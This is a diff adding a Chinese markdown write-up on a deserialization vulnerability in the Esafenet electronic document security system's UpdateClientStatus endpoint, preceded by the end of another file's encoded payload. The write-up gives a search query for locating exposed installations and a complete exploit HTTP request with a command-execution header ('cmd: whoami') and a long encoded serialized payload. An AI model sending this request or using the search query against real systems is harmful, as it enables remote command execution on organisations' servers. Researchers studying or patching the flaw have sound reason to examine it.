JLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605356017-ab5cffba-7228-447a-b907-34a14be56302.png](./img/k6HgGvFP2_AD6epE/1706605356017-ab5cffba-7228-447a-b907-34a14be56302-376758.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yh60f64ymxkagf0z>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..940ea48
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UpdateClientStatus存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UpdateClientStatus存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UpdateClientStatus存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/QzrzLUujmmYPkzrW/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-333987.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UpdateClientStatus HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAF